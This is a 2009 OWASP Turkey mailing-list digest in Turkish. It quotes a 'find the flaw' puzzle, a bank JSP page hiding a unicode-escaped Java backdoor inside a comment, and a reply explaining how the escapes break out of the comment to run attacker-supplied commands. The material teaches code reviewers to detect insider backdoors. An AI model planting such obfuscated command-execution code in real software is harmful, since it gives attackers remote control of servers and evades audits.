[Owasp-turkey] Owasp-turkey Digest, Vol 31, Issue 22

Oğuzhan YILMAZ aspsrc at gmail.com
Tue Oct 20 13:03:09 EDT 2009


insanın ufkunu açan bir şey. Teşekkürler.

Oğuzhan YILMAZ


20 Ekim 2009 19:00 tarihinde <owasp-turkey-request at lists.owasp.org> yazdı:

> Send Owasp-turkey mailing list submissions to
>        owasp-turkey at lists.owasp.org
>
> To subscribe or unsubscribe via the World Wide Web, visit
>        https://lists.owasp.org/mailman/listinfo/owasp-turkey
> or, via email, send a message with subject or body 'help' to
>        owasp-turkey-request at lists.owasp.org
>
> You can reach the person managing the list at
>        owasp-turkey-owner at lists.owasp.org
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Owasp-turkey digest..."
>
>
> Today's Topics:
>
>   1. Re: Ar?zay? Bul #4 (Bedirhan Urgun)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Tue, 20 Oct 2009 18:38:07 +0300
> From: Bedirhan Urgun <bedirhanurgun at gmail.com>
> Subject: Re: [Owasp-turkey] Ar?zay? Bul #4
> To: OWASP-T?rkiye <owasp-turkey at lists.owasp.org>
> Message-ID:
>        <297cff690910200838q3a62d820oa1b91f630755ef86 at mail.gmail.com>
> Content-Type: text/plain; charset="utf-8"
>
> digerlerine daha gore daha ilgi ceker dedim ama...  :)) cekmedi
>
> cevap "herkes developer'lara guveniyor ama uretimin canina okuyabilirler"
> mantigi ile yazilmis bir backdoor. Java belirli bir formatta (\uxxxx)
> unicode karakterler ile kod yazilmasina imkan taniyor. Yani butun
> identifier, keyword, operator v.b.'lerin ascii olmasina gerek yok. (C# icin
> ise boyle bir kisitlama var yani keyword ve operator'ler icin mesela sadece
> ascii karakterler kullanilabiliyor.). Kisacasi verdigim JSP icerisindeki
> unicode formatinda yazilan bolumu, basina ve sonuna ' karakteri koyduktan
> sonra
>
> http://www.webguvenligi.org/ipacker/ipacker.html
>
> uygulamasinin INPUT bolumune koyup EVAL TO OUTPUT butonuna basarsaniz,
> aslinda developer'in nasil bir backdoor yazdigini gorebilirsiniz. Ortaya
> cikan parca, multiline comment bolumunu kapatip, asil backdoor kodunu
> yazip,
> daha sonra tekrar multiline comment bolumunu aciyor (ki "syntax error"
> almayalim, ayni sqli, ldapi gibi).
>
> Bu sekilde ciplak gozle bakan veya regex ile audit yapmaya calisan bir
> denetimcinin isi zorlasiyor.
>
> bedirhan
>
> 18 Ekim 2009 21:05 tarihinde Bedirhan Urgun <bedirhanurgun at gmail.com>
> yazd?:
>
> >
> > Bu kez eglenceli bir ariza var :) Ise farkli bir perspektiften bakmayi
> > gerektiriyor. Bir JSP sayfasi...
> >
> > bedirhan
> >
> > Arizayi Bul #4
> > --------------------
> >
> > <%@page <%25 at page> contentType="text/html" pageEncoding="UTF-8"%>
> > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> >    "http://www.w3.org/TR/html4/loose.dtd">
> > <html>
> >     <head>
> >         <meta http-equiv="Content-Type" content="text/html;
> charset=UTF-8">
> >         <title>BankHorizon Welcome Page</title>
> >         <link rel="stylesheet" type="text/css" href="style.css" />
> >     </head>
> >     <body>
> >         <% /* Include the header page */ %>
> >         <jsp:include page="header.jsp" />
> >         <% /* Include the menu page */ %>
> >         <jsp:include page="menu.jsp" />
> >         <% /* Include the footer menu left page */ %>
> >         <jsp:include page="footer_menu_left.jsp" />
> >         <h2></h2>
> >         <jsp:include page="data_validation.jsp" />
> >         <%
> >             /************************************COMMENT
> > BEGIN**************************************
> >            This is unicode that will be used for data validation
> >
> >
> \u002a\u002f\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0061\u0072\u006b\u0061\u006b\u0061\u0070\u0069\u0022\u0029\u003b\u0020\u0069\u0066\u0020\u0028\u0020\u0073\u0021\u003d\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0073\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0020\u0022\u0061\u0063\u0069\u006b\u0022\u0020\u0029\u0020\u0029\u0020\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0020\u0022\u006b\u006f\u006d\u0075\u0074\u0022\u0020\u0029\u0020\u0029\u003b\u0020\u007d\u002f\u002a
> >             *************************************COMMENT
> > END***********************************/
> >             String lang = request.getParameter("language");
> >             // use the unicode above to validate the data
> >             validateUnicode(lang);
> >         %>
> >         <br/>
> >         <% /* Include the footer bottom page */ %>
> >         <jsp:include page="footer_bottom.jsp" />
> >     </body>
> > </html>
> >
>
>
>
> --
> Bedirhan Urgun
> http://www.webguvenligi.org
> http://www.owasp.org/index.php/Turkey
>
> T?rk?e Web Uygulama G?venli?i E-Posta Listesine ?ye olmak i?in:
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> https://lists.owasp.org/pipermail/owasp-turkey/attachments/20091020/a678bcf7/attachment-0001.html
>
> ------------------------------
>
> _______________________________________________
> Owasp-turkey mailing list
> Owasp-turkey at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
>
> End of Owasp-turkey Digest, Vol 31, Issue 22
> ********************************************
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20091020/781cd448/attachment.html 


More information about the Owasp-turkey mailing list